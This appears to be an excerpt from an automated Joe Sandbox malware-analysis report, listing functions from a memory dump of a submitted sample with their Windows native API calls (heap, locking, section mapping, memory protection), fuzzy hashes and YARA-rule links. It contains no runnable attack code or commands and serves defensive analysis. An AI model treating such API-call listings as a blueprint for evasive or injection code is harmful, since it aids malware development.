Opcode Fuzzy Hash: 41a8056add7bda09d84b0e048a1790ecd0e4689e8167206683fb620b79666711
Instruction Fuzzy Hash: 0031B43A600594EFDB13CE5CC980F6A77B9DB84718F15906BED869B284DB34DE40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 72646700, Relevance: 6.1, APIs: 4, Instructions: 92timeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A ref: 7264671F
RtlGetCurrentServiceSessionId.210A(00000001), ref: 7264674C
RtlDebugPrintTimes.210A(?,?,?,?,00000001), ref: 72646781
RtlGetCurrentServiceSessionId.210A ref: 72646789

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession$DebugPrintTimes
String ID:
API String ID: 286911700-0
Opcode ID: 7ec5cdbcf2bd0612625b55db07e19fcdc7da760afa3292d889dfa11cfbb341e7
Instruction ID: b9646760b49b42a5a1f61d7dd2dcd555940c04bed193c53224cee682cf1632aa
Opcode Fuzzy Hash: 7ec5cdbcf2bd0612625b55db07e19fcdc7da760afa3292d889dfa11cfbb341e7
Instruction Fuzzy Hash: 74318D35601A46EFD7068F28DA90E9ABBB2FF84714F40506AEC0157AA0DB31ED35CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 7271454B, Relevance: 6.1, APIs: 4, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 726885B7: memset.210A(?,00000000,0000002C,00000000,00000000,00000000), ref: 726885EC
Part of subcall function 726885B7: memset.210A(?,00000000,00000030,00000000,00000000,00000000), ref: 726885FF
Part of subcall function 726885B7: ZwQuerySystemInformation.210A(00000000,?,0000002C,00000000,?,?,?,00000000,00000000,00000000), ref: 72688659
Part of subcall function 726885B7: ZwQueryInformationThread.210A(000000FE,00000000,?,0000001C,00000000,00000000,?,0000002C,00000000,?,?,?,00000000,00000000,00000000), ref: 72688677
Part of subcall function 726885B7: ZwQueryInformationThread.210A(000000FE,00000001,?,00000020,00000000,000000FE,00000000,?,0000001C,00000000,00000000,?,0000002C,00000000), ref: 72688694
Part of subcall function 726885B7: ZwQuerySystemInformation.210A(00000003,?,00000030,00000000,000000FE,00000001,?,00000020,00000000,000000FE,00000000,?,0000001C,00000000,00000000,?), ref: 726886B0
Part of subcall function 726885B7: RtlAllocateHeap.210A(?,00000008,?,00000003,?,00000030,00000000,000000FE,00000001,?,00000020,00000000,000000FE,00000000,?,0000001C), ref: 726886FC

RtlNtStatusToDosError.210A(00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000,00000000,00000000,?,72684C8F), ref: 72714576
RtlEnterCriticalSection.210A(00000048,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 7271458C
RtlLeaveCriticalSection.210A(00000048,00000048,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 727145D3
ZwClose.210A(?,?,?,00000000,?,?,00000048,00000048,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 72714631

Part of subcall function 72715567: ZwDelayExecution.210A(00000000,FFD9DA60,00000000,00000000,00000000,?,727145ED,?,?,00000048,00000048,00000000,00000000,00000000,00000000), ref: 72715589

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationQuery$CriticalSectionSystemThreadmemset$AllocateCloseDelayEnterErrorExecutionHeapLeaveStatus
String ID:
API String ID: 154775127-0
Opcode ID: 07df0da10b43546ad8b3a63e43d640e9c28b07600671f487ac19ad289d15eae3
Instruction ID: 75e5612649c5dbd8bc91234a46fa94613cfa67e3679e509b14f3baf9bcb4e71f
Opcode Fuzzy Hash: 07df0da10b43546ad8b3a63e43d640e9c28b07600671f487ac19ad289d15eae3
Instruction Fuzzy Hash: 4A31B431A007169BD712CA7DC9A1A9FBBFABFC4724F24456ED45693280EF30A941C794

Uniqueness

Uniqueness Score: -1.00%

Function 7266C308, Relevance: 6.1, APIs: 4, Instructions: 89nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000000,?,00000000), ref: 7266C33B
RtlGetCurrentServiceSessionId.210A(00000000,?,00000000), ref: 726B1D6A

Part of subcall function 7266C04A: RtlImageNtHeader.210A(?,00000000,?,02BE0000), ref: 7266C087
Part of subcall function 7266C04A: RtlFreeHeap.210A(?,00000000,?,?,7266C371,00000000,?,?,00000000,?,02BE0000), ref: 7266C136
Part of subcall function 7266C04A: ZwCreateSection.210A(00000000,000F0005,00000000,00000000,02BE0000,08000000,00000000,7266C371,00000000,?,?,00000000,?,02BE0000), ref: 7266C157

Part of subcall function 7265541D: memcmp.210A(?,0000002C,00000010,?,00000000,00000000,00001000,00000000,?,00000000,?,00001000,00000001,?,00000000,02BE0000), ref: 7265547E
Part of subcall function 7265541D: _wcsicmp.210A(00000000,?), ref: 72655497

ZwUnmapViewOfSection.210A(000000FF,?,02BE0000,?,?,?,?,?,?,?,00000000,?,00000000), ref: 726B1D9D
ZwClose.210A(?,000000FF,?,02BE0000,?,?,?,?,?,?,?,00000000,?,00000000), ref: 726B1DA6

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentSectionServiceSession$CloseCreateFreeHeaderHeapImageUnmapView_wcsicmpmemcmp
String ID:
API String ID: 2905241850-0
Opcode ID: 4f0cecbf00c2fd73d3af3e8346a8fbdc8ff64f1c54c8e5d4c7bd935f85219cbf
Instruction ID: 1dd140ac28e04089cd9ceae428ef86557b93c18b9a6d1c3aa686f5e554571fca
Opcode Fuzzy Hash: 4f0cecbf00c2fd73d3af3e8346a8fbdc8ff64f1c54c8e5d4c7bd935f85219cbf
Instruction Fuzzy Hash: ED31BAB26082459FCB02CF1CD840A9A7BEAEF88310F1405AAFC41D73A1C735DC10CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 72688442, Relevance: 6.1, APIs: 4, Instructions: 86memorynativeCOMMON

Download Yara Rule

APIs

ZwAllocateVirtualMemory.210A(000000FF,00000000,00000000,00000000,00001000,00000004,00000000,?,00000130,00002000,00000004,?,00000000), ref: 726884A7

Part of subcall function 7268A360: LdrInitializeThunk.NTDLL(726D12FF,000000FF,00000000,00000000,0000000C,00001000,00000004,72720200,0000001C,726D1056), ref: 7268A36A

memset.210A(00000000,00000000,00000048,000000FF,00000000,00000000,00000000,00001000,00000004,00000000,?,00000130,00002000,00000004,?,00000000), ref: 726884BC
RtlEnterCriticalSection.210A(00000048,00000000,?,00000130,00002000,00000004,?,00000000), ref: 726884E4
RtlLeaveCriticalSection.210A(00000048,00000048,00000000,?,00000130,00002000,00000004,?,00000000), ref: 72688511

Part of subcall function 7265DB60: RtlpNotOwnerCriticalSection.210A(?,?,?), ref: 7265DB97

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$AllocateEnterInitializeLeaveMemoryOwnerRtlpThunkVirtualmemset
String ID:
API String ID: 3475514402-0
Opcode ID: d715a952d3e85004b35333a2e86cd386d23ad84518f432b7ca9aae7f73663c49
Instruction ID: 8e7c8f7ab8110cf3c955c2d4ec1ec55688dd5614f481dfa14c112522865d4f36
Opcode Fuzzy Hash: d715a952d3e85004b35333a2e86cd386d23ad84518f432b7ca9aae7f73663c49
Instruction Fuzzy Hash: 9F31BF72A00609EFD705CF68C941B9EF7F9FF49714F10816AE659D7280EB30AA42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 726EC6F4, Relevance: 6.1, APIs: 4, Instructions: 79timeCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(72736620,72720658,00000024,726EBF32,00000000,00000000,?,?,726A3901), ref: 726EC721
RtlDebugPrintTimes.210A(?,?,72720658,00000024,726EBF32,00000000,00000000,?,?,726A3901), ref: 726EC749
RtlDebugPrintTimes.210A(72736640,?,72720658,00000024,726EBF32,00000000,00000000,?,?,726A3901), ref: 726EC786
RtlDebugPrintTimes.210A(00000030,?,72720658,00000024,726EBF32,00000000,00000000,?,?,726A3901), ref: 726EC7B7

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: DebugPrintTimes$CriticalEnterSection
String ID:
API String ID: 767555189-0
Opcode ID: 5b701986baa11078fae2770eef3b688ad61d9addec626fb3ed6eaccc5f8a7a2f
Instruction ID: 5e3c4fcd3b1491c16152c7088458e2d848a7c1b00d5a3ff56c9ca7eb839e0608
Opcode Fuzzy Hash: 5b701986baa11078fae2770eef3b688ad61d9addec626fb3ed6eaccc5f8a7a2f
Instruction Fuzzy Hash: E531EE75E1126A8BCF01CFA9C985ADDBBF6BF88741F14412AE802B7291CB309840CF64

Uniqueness

Uniqueness Score: -1.00%

Function 726716E5, Relevance: 6.1, APIs: 4, Instructions: 75memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,?,?,?,7FFE03C0,7FFE03C0,?,?), ref: 7267171B
ZwQuerySystemInformationEx.210A(0000006B,00000001,00000004,00000000,?,?,?,?,?,?,7FFE03C0,7FFE03C0,?,?), ref: 7267173A
memset.210A(00000000,00000000,?,0000006B,00000001,00000004,00000000,?,?,?,?,?,?,7FFE03C0,7FFE03C0,?), ref: 72671755
RtlFreeHeap.210A(?,?,00000000,0000006B,00000001,00000004,00000000,?,?,?,?,?,?,7FFE03C0,7FFE03C0,?), ref: 7267179B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$AllocateFreeInformationQuerySystemmemset
String ID:
API String ID: 21860560-0
Opcode ID: c3783965f164b5e5b740036666e93374b434345dd511fdad76b2041f2ca7a040
Instruction ID: 2a7d9bd42eeb7df0406012f9b47604b6ee663fdd3b817bd7ea567ab271a92f5b
Opcode Fuzzy Hash: c3783965f164b5e5b740036666e93374b434345dd511fdad76b2041f2ca7a040
Instruction Fuzzy Hash: 2B2180B2A00109AFD705CF58CE81B5ABBBDFB44718F2504AAE505AB691D371ED11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 7266F7F9, Relevance: 6.1, APIs: 4, Instructions: 75nativetimeCOMMON

Download Yara Rule

APIs

ZwCreateTimer2.210A(00000058,00000000,00000000,00000008,00100002,00000040,00000000,00000000), ref: 7266F826
ZwCreateWaitCompletionPacket.210A(0000005C,00000001,00000000,00000058,00000000,00000000,00000008,00100002,00000040,00000000,00000000), ref: 7266F836
ZwAssociateWaitCompletionPacket.210A(?,00000000,00000058,00000060,?,00000000,?,?,0000005C,00000001,00000000,00000058,00000000,00000000,00000008,00100002), ref: 7266F866
ZwClose.210A(00000058,0000005C,00000001,00000000,00000058,00000000,00000000,00000008,00100002,00000040,00000000,00000000), ref: 726B32EF

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CompletionCreatePacketWait$AssociateCloseTimer2
String ID:
API String ID: 56835937-0
Opcode ID: 435a89faf8828a39076b4cbd978392d3cabd8c376169b22fac2170f355733f70
Instruction ID: b3481bed3925bd32d60a3cab18429bf75d839e76d4ff15690b757a317974c312
Opcode Fuzzy Hash: 435a89faf8828a39076b4cbd978392d3cabd8c376169b22fac2170f355733f70
Instruction Fuzzy Hash: D72151B1A0020AAFD740CF99C9C0EA6BFB8FF48304F10446AE54597281D771E966CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 726D6042, Relevance: 6.1, APIs: 4, Instructions: 74memorynativeCOMMON

Download Yara Rule

APIs

ZwClose.210A(00000000,00000000,00000000,00000000,?,?,726BAC63,00000001,7273861C,7271FC78,00000020,7265AE34,?,00000000,?,00000001), ref: 726D607C
RtlAllocateHeap.210A(?,00000008,?,00000000,00000000,00000000,?,?,726BAC63,00000001,7273861C,7271FC78,00000020,7265AE34,?,00000000), ref: 726D60C0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateCloseHeap
String ID:
API String ID: 3565931908-0
Opcode ID: 5ceb9604905b0a683faea875e748efea0b7a80405e33c5d8631c5da99ea8a672
Instruction ID: 8a887e3edbe32de5344a6e15fcfc5fd83cc3c950a09398d7472c29fb608bd42b
Opcode Fuzzy Hash: 5ceb9604905b0a683faea875e748efea0b7a80405e33c5d8631c5da99ea8a672
Instruction Fuzzy Hash: 9021A432600E96EBDB115E5DEA01712B778BB4133CF41032FEC22936E1CB62E851C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 726841D4, Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,00000028,?,?,72653AD9,00000000,00000000,00000001), ref: 726841F7
RtlGetLocaleFileMappingAddress.210A(00000001,727365D4,72653AD9,?,00000008,00000028,?,?,72653AD9,00000000,00000000,00000001), ref: 72684213

Part of subcall function 72684290: ZwInitializeNlsFiles.210A(00000028,00000008,?,?,?,00000000,?,72684218,00000001,727365D4,72653AD9,?,00000008,00000028,?), ref: 726842BD

RtlFreeHeap.210A(?,00000000,00000000,00000001,727365D4,72653AD9,?,00000008,00000028,?,?,72653AD9,00000000,00000000,00000001), ref: 726BDDF3
RtlFreeHeap.210A(?,00000000,00000000,00000001,727365D4,72653AD9,?,00000008,00000028,?,?,72653AD9,00000000,00000000,00000001), ref: 726BDE0B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$Free$AddressAllocateFileFilesInitializeLocaleMapping
String ID:
API String ID: 1831200515-0
Opcode ID: 793b5660bde058d099f6c7df6680b018b72e8f5d5db17b389087c53916458f44
Instruction ID: 0e7b98d429fdfec530aaf260786249127c43089b65e02a2befd1933e6c8a51ad
Opcode Fuzzy Hash: 793b5660bde058d099f6c7df6680b018b72e8f5d5db17b389087c53916458f44
Instruction Fuzzy Hash: 1F21BA39641A409FC725DF6CC940B56B7F6AF08704F24446AE949CBBA2E730E842CB99

Uniqueness

Uniqueness Score: -1.00%

Function 7264516E, Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 72645275: RtlEnterCriticalSection.210A(727379A0,?,00000000,?), ref: 7264528F
Part of subcall function 72645275: RtlLeaveCriticalSection.210A(727379A0,727379A0,?,00000000,?), ref: 726452AD

RtlEqualUnicodeString.210A(?,?,00000001,?,?,?), ref: 726A1A2E
RtlLeaveCriticalSection.210A(727379A0,?,?,?), ref: 726A1A47

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$Leave$EnterEqualStringUnicode
String ID:
API String ID: 4283003422-0
Opcode ID: a21311e764d9348e6c4dc4222b30682384ebdb7f3e80cce1d524598cec64684d
Instruction ID: 89a9c466487217aa459e0668ab78d540d2ed1cbb9dbc3b3ee73bbb425a14a92a
Opcode Fuzzy Hash: a21311e764d9348e6c4dc4222b30682384ebdb7f3e80cce1d524598cec64684d
Instruction Fuzzy Hash: 41113A755012049BCB269F6CC450AA9BBF5EF15710F1011A7ED87972C8DB31CD41C660

Uniqueness

Uniqueness Score: -1.00%

Function 7271926E, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(727386C8,72720C80,00000010,7264A49E), ref: 72719286
RtlDelete.210A(?,727386C8,72720C80,00000010,7264A49E), ref: 727192B0
RtlFreeUnicodeString.210A(00000048,727386C8,72720C80,00000010,7264A49E), ref: 727192FA
RtlFreeHeap.210A(?,00000000,00000000,00000048,727386C8,72720C80,00000010,7264A49E), ref: 7271930B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Free$AcquireDeleteExclusiveHeapLockStringUnicode
String ID:
API String ID: 408252957-0
Opcode ID: 49fcd27cfd3af634cb7eaea0b91c1f3520bab424b379d665b026940fc7e3fdcd
Instruction ID: a37a880972e66d4d670e75225478abeb56c31c78faaaaee84ed0e53c8a5d7074
Opcode Fuzzy Hash: 49fcd27cfd3af634cb7eaea0b91c1f3520bab424b379d665b026940fc7e3fdcd
Instruction Fuzzy Hash: 5C117C71A01266CFCB19DF9DC680A9FBBB3BF84710F50595AD405AB289C770AA42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 7266F076, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(C0000135,00000001,?,7266BE43,727385F0,?,00000030), ref: 7266F07B
RtlGetCurrentServiceSessionId.210A(C0000135,00000001,?,7266BE43,727385F0,?,00000030), ref: 7266F0A2
RtlGetCurrentServiceSessionId.210A(C0000135,00000001,?,7266BE43,727385F0,?,00000030), ref: 726B2F48
RtlGetCurrentServiceSessionId.210A ref: 726B2F90

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession
String ID:
API String ID: 1007659313-0
Opcode ID: 63fe6dcfbcb91f63b4e7ae4ac653ef60d153100ae244f8b684cc274590c6630a
Instruction ID: a1a4fd9a1520548fd79c591f3f98ca123423051ee6973877e8962dd8847d018c
Opcode Fuzzy Hash: 63fe6dcfbcb91f63b4e7ae4ac653ef60d153100ae244f8b684cc274590c6630a
Instruction Fuzzy Hash: 0D11A5326456C19BD3138B1CCA98B2577EAAF41754F2504A2ED028B6D2D72DC852C352

Uniqueness

Uniqueness Score: -1.00%

Function 7264A6D7, Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?,?,00000000,?,7267D438,00000000,?,?,?,?,?,72643DCD,?,00000000,7271EEC0,00000084), ref: 7264A6E9
RtlReleaseSRWLockExclusive.210A(?,?,?,00000000,?,7267D438,00000000,?,?,?,?,?,72643DCD,?,00000000,7271EEC0), ref: 7264A706
RtlReleaseSRWLockExclusive.210A(?,?,?,00000000,?,7267D438,00000000,?,?,?,?,?,72643DCD,?,00000000,7271EEC0), ref: 726A5185
RtlFreeHeap.210A(?,00000000,00000000,?,?,?,00000000,?,7267D438,00000000,?,?,?,?,?,72643DCD), ref: 726A5196

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$Release$AcquireFreeHeap
String ID:
API String ID: 2563869513-0
Opcode ID: 641b8f4760d8dc70209bedab29d006b15a85e022a1a2676546acb98be64df9b5
Instruction ID: e99fca2f4729777b0e6d49189ad9c84b3de09f33668fb8c36e1efdaca6b825df
Opcode Fuzzy Hash: 641b8f4760d8dc70209bedab29d006b15a85e022a1a2676546acb98be64df9b5
Instruction Fuzzy Hash: 0901AD72641205ABC325DF2DDC10F2ABBB9EB81325F5486ABE4498B6C2DA35DC41C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 72648160, Relevance: 6.1, APIs: 4, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(7273864C,00000000,-00000001,72738630,?,726A3AE2,72738630,?,?,00000000,72647DD1,?), ref: 7264816E
ZwUnlockVirtualMemory.210A(000000FF,00000008,0000000C,00000001,7273864C,00000000,-00000001,72738630,?,726A3AE2,72738630,?,?,00000000,72647DD1,?), ref: 726481A6
RtlFreeHeap.210A(?,00000000,00000000,000000FF,00000008,0000000C,00000001,7273864C,00000000,-00000001,72738630,?,726A3AE2,72738630,?,?), ref: 726481BA
RtlReleaseSRWLockExclusive.210A(7273864C,7273864C,00000000,-00000001,72738630,?,726A3AE2,72738630,?,?,00000000,72647DD1,?), ref: 726481C0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapMemoryReleaseUnlockVirtual
String ID:
API String ID: 437276796-0
Opcode ID: d79f4f4ef48ada181feccb00d4131feda3070ee9fb7823eea831d0129b0e9e55
Instruction ID: bc9284ab0f6751fdfbbf0931651042a3fcb3b67d8df8c40458e6a7789c4384d1
Opcode Fuzzy Hash: d79f4f4ef48ada181feccb00d4131feda3070ee9fb7823eea831d0129b0e9e55
Instruction Fuzzy Hash: DC01D472101255AFC3268A29CC40F57BBAEEB81B60F15512BF5568B2D1CE70E902C794

Uniqueness

Uniqueness Score: -1.00%

Function 726716C5, Relevance: 6.1, APIs: 4, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.210A(?,?,?,72671657,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 726B3E72
RtlFreeHeap.210A(?,?,?,72671657,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 726B3E96
RtlFreeHeap.210A(?,?,?,72671657,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 726B3EBA
RtlFreeHeap.210A(?,?,00000000,72671657,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 726B3ED7

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 83a6a4c399d691800d3150e9ea7c06d6ede4f28fe3d4f9c54e8a3ae3ba2307f6
Instruction ID: a2a31a384dd7a6702e3078a2772ff1b7dd146ee35f359667b29b143a52faa409
Opcode Fuzzy Hash: 83a6a4c399d691800d3150e9ea7c06d6ede4f28fe3d4f9c54e8a3ae3ba2307f6
Instruction Fuzzy Hash: 79116636611454DFCB19DF0DCA50F6A77BAFF48A04F65006EE406A7A92C338EC11CB94

Uniqueness

Uniqueness Score: -1.00%

Function 7270B2E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110nativeCOMMON

Download Yara Rule

APIs

ZwQueryVirtualMemory.210A(000000FF,?,00000000,?,0000001C,00000000,?,?,?,?,?,?,?,?,726474E8,72736620), ref: 7270B2FE
ZwProtectVirtualMemory.210A(000000FF,?,?,?, fsr,000000FF,?,00000000,?,0000001C,00000000,?,?), ref: 7270B321

Strings

fsr, xrefs: 7270B30F, 7270B312

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: MemoryVirtual$ProtectQuery
String ID: fsr
